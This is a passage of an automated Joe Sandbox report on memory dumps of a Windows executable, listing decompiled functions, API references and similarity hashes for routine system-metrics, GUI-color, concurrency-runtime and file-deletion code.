Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: CriticalSection$EnterProfile$H_prolog3InitializeLeave
String ID: DragDelay$DragMinDist$dk$windows
API String ID: 3965097884-4228829393
Opcode ID: c50f79ce0adc857029fb9407ced14f8dbf50bd8db2cd6d20b8cc150b793a0201
Instruction ID: 27f9c4a9d2fc78eba2063e5def23805cc082716089017347b6df044bfa9b673f
Opcode Fuzzy Hash: c50f79ce0adc857029fb9407ced14f8dbf50bd8db2cd6d20b8cc150b793a0201
Instruction Fuzzy Hash: CC011AB0A40705AFD790EF759D86B957AE0FB08700F90A529E108E7A91D7B894548F54

Uniqueness

Uniqueness Score: -1.00%

Function 00D0E1D5 Relevance: 12.0, APIs: 8, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00D0E1D5(void* __ecx) {
				intOrPtr _t5;
				void* _t15;
				struct HDC__* _t17;

				_t15 = __ecx;
				_t5 =  *((intOrPtr*)( *0xe8e80c))(0xb); // executed
				 *((intOrPtr*)(__ecx + 8)) = _t5;
				 *((intOrPtr*)(_t15 + 0xc)) = GetSystemMetrics(0xc);
				 *0xf0b3a8 = GetSystemMetrics(2) + 1;
				 *0xf0b3ac = GetSystemMetrics(3) + 1;
				_t17 = GetDC(0);
				 *((intOrPtr*)(_t15 + 0x18)) = GetDeviceCaps(_t17, 0x58);
				 *((intOrPtr*)(_t15 + 0x1c)) = GetDeviceCaps(_t17, 0x5a);
				return ReleaseDC(0, _t17);
			}

0x00d0e1dd
0x00d0e1e2
0x00d0e1e6
0x00d0e1ed
0x00d0e1f5
0x00d0e1ff
0x00d0e210
0x00d0e21a
0x00d0e222
0x00d0e22e

APIs

KiUserCallbackDispatcher.NTDLL(0000000B), ref: 00D0E1E2
GetSystemMetrics.USER32(0000000C), ref: 00D0E1E9
GetSystemMetrics.USER32(00000002), ref: 00D0E1F0
GetSystemMetrics.USER32(00000003), ref: 00D0E1FA
GetDC.USER32(00000000), ref: 00D0E204
GetDeviceCaps.GDI32(00000000,00000058), ref: 00D0E215
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D0E21D
ReleaseDC.USER32(00000000,00000000), ref: 00D0E225

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
String ID:
API String ID: 1031845853-0
Opcode ID: e328708cb6f32b472d1b90085567269e73617915e866399ef353e50fdaa3fec2
Instruction ID: e64036a80faa394cf647a4aa419947ec4322af97b08e0f6292a82b4092a3c062
Opcode Fuzzy Hash: e328708cb6f32b472d1b90085567269e73617915e866399ef353e50fdaa3fec2
Instruction Fuzzy Hash: 9FF0BD71E40314AEEB145F729C8DB2B7FA4EB45B61F144456EA04AF291D6B588058FD0

Uniqueness

Uniqueness Score: -1.00%

Function 00D3302F Relevance: 7.6, APIs: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E00D3302F(intOrPtr* __ecx, signed int __edx, struct tagLOGFONTW __fp0) {
				signed int _v8;
				struct _OSVERSIONINFOEXW _v292;
				void* __ebp;
				signed int _t11;
				signed int _t12;
				void* _t14;
				longlong _t15;
				void* _t21;
				intOrPtr* _t33;
				intOrPtr* _t38;
				signed int _t39;

				_t31 = __edx;
				_t11 =  *0xf02790; // 0x97f5acff
				_t12 = _t11 ^ _t39;
				_v8 = _t12;
				_t33 = __ecx;
				if( *__ecx == 0) {
					_v292.dwOSVersionInfoSize = 0x11c;
					_v292.dwMajorVersion = 6;
					_v292.dwMinorVersion = 1;
					0xe23f30( &(_v292.dwBuildNumber), 0, 0x110, _t21);
					_t38 =  *0xe8e324;
					_t14 =  *_t38(0, 0, 2, 3, 1, 3);
					_t15 =  *_t38(_t14, __edx);
					_push(__edx);
					 *((intOrPtr*)(_t33 + 0x17c)) = VerifyVersionInfoW( &_v292, 3, _t15);
					 *((intOrPtr*)(_t33 + 0x180)) = GetSystemMetrics(0x1000);
					E00D3398F(_t33, _t31); // executed
					E00D3347C(_t33, _t31, __fp0); // executed
					_t12 = E00D33114(_t33);
					 *((intOrPtr*)(_t33 + 0x19c)) = 1;
				}
				0xe2142c();
				return _t12;
			}

APIs

_memset.LIBCMT ref: 00D3307B
VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000003), ref: 00D33092
VerSetConditionMask.NTDLL(00000000), ref: 00D33096
VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 00D330A3
GetSystemMetrics.USER32(00001000), ref: 00D330B4

Part of subcall function 00D3398F: __EH_prolog3.LIBCMT ref: 00D33996
Part of subcall function 00D3398F: GetSysColor.USER32(00000016), ref: 00D339A8
Part of subcall function 00D3398F: GetSysColor.USER32(0000000F), ref: 00D339B5
Part of subcall function 00D3398F: GetSysColor.USER32(00000015), ref: 00D339C8
Part of subcall function 00D3398F: GetSysColor.USER32(0000000F), ref: 00D339D0
Part of subcall function 00D3398F: GetDeviceCaps.GDI32(?,0000000C), ref: 00D339F6
Part of subcall function 00D3398F: GetSysColor.USER32(0000000F), ref: 00D33A04
Part of subcall function 00D3398F: GetSysColor.USER32(00000010), ref: 00D33A0E
Part of subcall function 00D3398F: GetSysColor.USER32(00000015), ref: 00D33A18
Part of subcall function 00D3398F: GetSysColor.USER32(00000016), ref: 00D33A22
Part of subcall function 00D3398F: GetSysColor.USER32(00000014), ref: 00D33A2C
Part of subcall function 00D3398F: GetSysColor.USER32(00000012), ref: 00D33A36
Part of subcall function 00D3398F: GetSysColor.USER32(00000011), ref: 00D33A40
Part of subcall function 00D3398F: GetSysColor.USER32(00000006), ref: 00D33A47
Part of subcall function 00D3398F: GetSysColor.USER32(0000000D), ref: 00D33A4E
Part of subcall function 00D3398F: GetSysColor.USER32(0000000E), ref: 00D33A55
Part of subcall function 00D3398F: GetSysColor.USER32(00000005), ref: 00D33A5C
Part of subcall function 00D3398F: GetSysColor.USER32(00000008), ref: 00D33A66
Part of subcall function 00D3398F: GetSysColor.USER32(00000009), ref: 00D33A6D
Part of subcall function 00D3398F: GetSysColor.USER32(00000007), ref: 00D33A74
Part of subcall function 00D3398F: GetSysColor.USER32(00000002), ref: 00D33A7B
Part of subcall function 00D3398F: GetSysColor.USER32(00000003), ref: 00D33A82
Part of subcall function 00D3398F: GetSysColor.USER32(0000001B), ref: 00D33A8C
Part of subcall function 00D3398F: GetSysColor.USER32(0000001C), ref: 00D33A96

Part of subcall function 00D3347C: __EH_prolog3_GS.LIBCMT ref: 00D33486
Part of subcall function 00D3347C: GetDeviceCaps.GDI32(?,00000058), ref: 00D334A6
Part of subcall function 00D3347C: DeleteObject.GDI32(00000000), ref: 00D33516
Part of subcall function 00D3347C: DeleteObject.GDI32(00000000), ref: 00D33530
Part of subcall function 00D3347C: DeleteObject.GDI32(00000000), ref: 00D3354A
Part of subcall function 00D3347C: DeleteObject.GDI32(00000000), ref: 00D33564
Part of subcall function 00D3347C: DeleteObject.GDI32(00000000), ref: 00D3357E
Part of subcall function 00D3347C: DeleteObject.GDI32(00000000), ref: 00D33598
Part of subcall function 00D3347C: DeleteObject.GDI32(00000000), ref: 00D335B2

Part of subcall function 00D33114: GetSystemMetrics.USER32(00000031), ref: 00D33128
Part of subcall function 00D33114: GetSystemMetrics.USER32(00000032), ref: 00D33132
Part of subcall function 00D33114: SetRectEmpty.USER32(?), ref: 00D33141
Part of subcall function 00D33114: EnumDisplayMonitors.USER32(00000000,00000000,00D32FAA,?,?,770E9FF0,00000001,00D330D5), ref: 00D33151
Part of subcall function 00D33114: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00D33168
Part of subcall function 00D33114: SystemParametersInfoW.USER32(00001002,00000000,?,00000000), ref: 00D33190
Part of subcall function 00D33114: SystemParametersInfoW.USER32(00001012,00000000,?,00000000), ref: 00D331A6
Part of subcall function 00D33114: SystemParametersInfoW.USER32 ref: 00D331C8

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Color$DeleteObjectSystem$Info$Parameters$Metrics$CapsConditionDeviceMask$DisplayEmptyEnumH_prolog3H_prolog3_MonitorsRectVerifyVersion_memset
String ID:
API String ID: 2760246569-0
Opcode ID: ac5b37fafbb4dced2d14f870876174fa1e6242a1a2441bca0d98956b603630d3
Instruction ID: da04269eb8f0360266398c5a16240c99f463280597a574d43d0e55fe7ef2d6ae
Opcode Fuzzy Hash: ac5b37fafbb4dced2d14f870876174fa1e6242a1a2441bca0d98956b603630d3
Instruction Fuzzy Hash: 48119171A00218AFDB25AF65AC46BEAFBBCEB49710F00015AB509A7281CB705E148FE0

Uniqueness

Uniqueness Score: -1.00%

Function 00E56ED3 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00E56EDA
std::_Cnd_waitX.LIBCPMT ref: 00E56EFA

Part of subcall function 00E51764: __Mtx_init.LIBCPMT ref: 00E5176E

std::_Cnd_initX.LIBCPMT ref: 00E56F33
std::_Cnd_initX.LIBCPMT ref: 00E56F5B

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: std::_$Cnd_init$Cnd_waitH_prolog3Mtx_init
String ID:
API String ID: 2294004850-0
Opcode ID: ba62a233e4c96b2175eb9a39bbd42abcab7d163b4c71f120453c5ec50ce30c5f
Instruction ID: 349cd41762398f72883e1a7954e64ee078d8ecd6fa0b8396c1cf9404a1680ae5
Opcode Fuzzy Hash: ba62a233e4c96b2175eb9a39bbd42abcab7d163b4c71f120453c5ec50ce30c5f
Instruction Fuzzy Hash: A401FC70F002546BCB10EF29AD8279973D0BB15725F02A569FC14FB291DB30CE049B40

Uniqueness

Uniqueness Score: -1.00%

Function 00E56FFF Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00E57006
std::_Cnd_waitX.LIBCPMT ref: 00E57026

Part of subcall function 00E51764: __Mtx_init.LIBCPMT ref: 00E5176E

std::_Cnd_initX.LIBCPMT ref: 00E5705F
std::_Cnd_initX.LIBCPMT ref: 00E57087

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: std::_$Cnd_init$Cnd_waitH_prolog3Mtx_init
String ID:
API String ID: 2294004850-0
Opcode ID: b98993a349d2566b2a40f96ab9ef2dc59aec34ad5f90fbbbbe332d1cd087235d
Instruction ID: 69e62ebb165d09d73780646e3c3f93a1d3ceaa392d8d6b1f401d317d77efa278
Opcode Fuzzy Hash: b98993a349d2566b2a40f96ab9ef2dc59aec34ad5f90fbbbbe332d1cd087235d
Instruction Fuzzy Hash: AD01F7B0E41364ABCB20EB287D8279933D0BB05329F116969FC59FB2C2CB708E019B40

Uniqueness

Uniqueness Score: -1.00%

Function 00E6CFA7 Relevance: 6.0, APIs: 4, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCMT ref: 00E6CFCA

Part of subcall function 00E75D5A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCMT ref: 00E75D81
Part of subcall function 00E75D5A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCMT ref: 00E75D98
Part of subcall function 00E75D5A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCMT ref: 00E75DFB
Part of subcall function 00E75D5A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCMT ref: 00E75E03

Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00E6CFE2
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 00E6CFEC
__CxxThrowException@8.LIBCMT ref: 00E6D00C

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Concurrency::details::Context$Base::$Internal$Scheduler$AvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushThrowVirtualWork
String ID:
API String ID: 2737591251-0
Opcode ID: 04f13102462142c294b01ddd2a11b46af48d63877764e6986a0610195daa30b0
Instruction ID: 0614620b59a2aa3ea5930d94969d7d3175e476ae394e7bd2043e973f58a19b82
Opcode Fuzzy Hash: 04f13102462142c294b01ddd2a11b46af48d63877764e6986a0610195daa30b0
Instruction Fuzzy Hash: C3F05032B4012867CB21B665F81287EF3E94FD0790F54612AF815B3251EF709F1147C1

Uniqueness

Uniqueness Score: -1.00%

Function 00E6F3B3 Relevance: 6.0, APIs: 4, Instructions: 32
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3.LIBCMT ref: 00E73DDC
Concurrency::details::_NonReentrantLock::_Acquire.LIBCMT ref: 00E73DE9
Concurrency::details::Etw::Etw.LIBCMT ref: 00E73E09
Concurrency::details::Etw::RegisterGuids.LIBCMT ref: 00E73E2F

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Concurrency::details::Etw::$AcquireConcurrency::details::_GuidsH_prolog3Lock::_ReentrantRegister
String ID:
API String ID: 3171971413-0
Opcode ID: dc2ddde0805afefd17efa77b49f9f9d1afecd57dfa6e50f4615786535342b978
Instruction ID: be866c1644b1daf74eb6179db59400b2201ec3fb9022f24f3a73a86ac0f96219
Opcode Fuzzy Hash: dc2ddde0805afefd17efa77b49f9f9d1afecd57dfa6e50f4615786535342b978
Instruction Fuzzy Hash: D4F0E260744348A6EBA4FB74AC07BA935D0AB4075AF40E16DA10C7A2C1CFF98F00B306

Uniqueness

Uniqueness Score: -1.00%

Function 00E67F7F Relevance: 6.0, APIs: 4, Instructions: 26
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00E6AC3F,0000FFFF,00000000,?,00000000), ref: 00E67F89
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,00E6AC3F,0000FFFF,00000000,?,00000000,?), ref: 00E67F93
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT ref: 00E67FB2
__CxxThrowException@8.LIBCMT ref: 00E67FC0

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
String ID:
API String ID: 3016159387-0
Opcode ID: 85c3f0158a6c270f3c889ddbf263de7adf39c95a1f5342e943b24cc174722409
Instruction ID: f9d7594d638437d0b9e9f48b8fb6b3ca227414db03d351c455da631ab3315cc5
Opcode Fuzzy Hash: 85c3f0158a6c270f3c889ddbf263de7adf39c95a1f5342e943b24cc174722409
Instruction Fuzzy Hash: 67E092347442099B8B10FBB5EA0AEBE73EC5B00344B6011A1B99DF2140EA34DE0487A3

Uniqueness

Uniqueness Score: -1.00%

Function 00CA3B57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E00CA3B57(intOrPtr* __ecx) {
				void* _t31;
				intOrPtr* _t48;
				void* _t50;

				0xe214d0(8);
				_t48 = __ecx;
				 *((intOrPtr*)(_t50 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t50 - 0x10)) = 0;
				_t51 =  *((intOrPtr*)(_t50 + 0x14));
				if( *((intOrPtr*)(_t50 + 0x14)) != 0) {
					 *__ecx = 0xe93bdc;
					 *((intOrPtr*)(__ecx + 0x60)) = 0xe92c2c;
					 *((intOrPtr*)(_t50 - 4)) = 0;
					 *((intOrPtr*)(_t50 - 0x10)) = 1;
				}
				_push(0);
				_push(0);
				_push(_t48 + 4);
				E00CA3C02(_t48);
				 *((intOrPtr*)(_t50 - 4)) = 1;
				 *((intOrPtr*)(_t48 +  *((intOrPtr*)( *_t48 + 4)))) = 0xe93bd8;
				_t12 =  *((intOrPtr*)( *_t48 + 4)) - 0x60; // -95
				 *((intOrPtr*)( *((intOrPtr*)( *_t48 + 4)) + _t48 - 4)) = _t12;
				E00CA3910(_t48 + 4, _t51, 0);
				_push( *((intOrPtr*)(_t50 + 0x10)));
				 *((char*)(_t50 - 4)) = 2;
				_push( *(_t50 + 0xc) | 0x00000002);
				_push( *((intOrPtr*)(_t50 + 8)));
				_t31 = L00CA9AAE(_t48 + 4); // executed
				if(_t31 == 0) {
					_t47 =  ==  ?  *( *((intOrPtr*)( *_t48 + 4)) + _t48 + 0xc) | 6 :  *( *((intOrPtr*)( *_t48 + 4)) + _t48 + 0xc) | 0x00000002;
					E00CA77A4( *((intOrPtr*)( *_t48 + 4)) + _t48,  ==  ?  *( *((intOrPtr*)( *_t48 + 4)) + _t48 + 0xc) | 6 :  *( *((intOrPtr*)( *_t48 + 4)) + _t48 + 0xc) | 0x00000002, 0);
				}
				0xe2149e();
				return _t48;
			}

APIs

__EH_prolog3.LIBCMT ref: 00CA3B5E
std::ios_base::clear.LIBCPMT ref: 00CA3BF3

Strings

,,, xrefs: 00CA3B78

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: H_prolog3std::ios_base::clear
String ID: ,,
API String ID: 973902081-1556401989
Opcode ID: 917935325396bb52e7776141b7cf79c193b7be0e056de554308b27859adb3c3c
Instruction ID: 84ac8463723ab0f2be04def77c8e08be46e5b25b77d0de66c941cc8cf878aa0d
Opcode Fuzzy Hash: 917935325396bb52e7776141b7cf79c193b7be0e056de554308b27859adb3c3c
Instruction Fuzzy Hash: 63116AB060024AAFDB00DF68C9869AEBBE5FF85308B20905DF819AB302D771DE11DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00E68F3E Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00E68FA6
Concurrency::details::_NonReentrantLock::_Acquire.LIBCMT ref: 00E68FB3

Part of subcall function 00E684FA: _SpinWait.LIBCMT ref: 00E6851A

Concurrency::details::ResourceManager::ResourceManager.LIBCMT ref: 00E69006

Part of subcall function 00D0BC90: _malloc.LIBCMT ref: 00D0BCAC

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: Resource$AcquireConcurrency::details::Concurrency::details::_H_prolog3Lock::_ManagerManager::ReentrantSpinWait_malloc
String ID:
API String ID: 4174107958-0
Opcode ID: a7ffe2dce22f5d7bbf5bdefe75bbb8e78e428dc1b31b8485cf71dc6a52ce5dc2
Instruction ID: d012f4055287ed5274ef482875bac6aeaf2d31e2513f7365583808a3b6e97abf
Opcode Fuzzy Hash: a7ffe2dce22f5d7bbf5bdefe75bbb8e78e428dc1b31b8485cf71dc6a52ce5dc2
Instruction Fuzzy Hash: CC01B530A492559BEB64FFB87A1539CB7E4AF28380F2010ADF009F7282DE754E009765

Uniqueness

Uniqueness Score: -1.00%

Function 00E24AE2 Relevance: 4.5, APIs: 3, Instructions: 20fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,00CA84B1,00E93C14,00E92A88,00000028), ref: 00E24AE8
GetLastError.KERNEL32(?,00CA84B1,00E93C14,00E92A88,00000028), ref: 00E24AF2
__dosmaperr.LIBCMT ref: 00E24B01

Memory Dump Source

Source File: 00000004.00000002.563872115.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000004.00000002.563766430.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.574108372.0000000000E8E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577635178.0000000000F00000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.577956616.0000000000F13000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578029988.0000000000F16000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.578295821.0000000000F3B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ca0000_38b2c7a1af454d382927f81543d86055886bc02863457.jbxd

Similarity

API ID: DeleteErrorFileLast__dosmaperr
String ID:
API String ID: 1545401867-0
Opcode ID: b3a1e1683a4f8a71ca7580424ba61d50f0cb99708403b3454965fc4e22587a53
Instruction ID: 99a9cf9e79a28c9445fbd38e93be6e0722c8adfdd80dbbb13c63e8c4c67e64de
Opcode Fuzzy Hash: b3a1e1683a4f8a71ca7580424ba61d50f0cb99708403b3454965fc4e22587a53
Instruction Fuzzy Hash: 67D0A7B12442196E8B212BF7FC049573BAC9B003753003621F42DE02F1FF62CC448150

Uniqueness

Uniqueness Score: -1.00%

Function 00CA3AEB Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00CA3AEB(intOrPtr* __ecx) {
				intOrPtr* _t31;
				void* _t32;

				0xe214d0(8);
				_t31 = __ecx;
				 *((intOrPtr*)(_t32 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t32 - 0x10)) = 0;
				if( *((intOrPtr*)(_t32 + 0x10)) != 0) {
					 *__ecx = 0xe92c38;
					 *((intOrPtr*)(__ecx + 0x18)) = 0xe92c2c;
					 *((intOrPtr*)(_t32 - 4)) = 0;
					 *((intOrPtr*)(_t32 - 0x10)) = 1;
				}
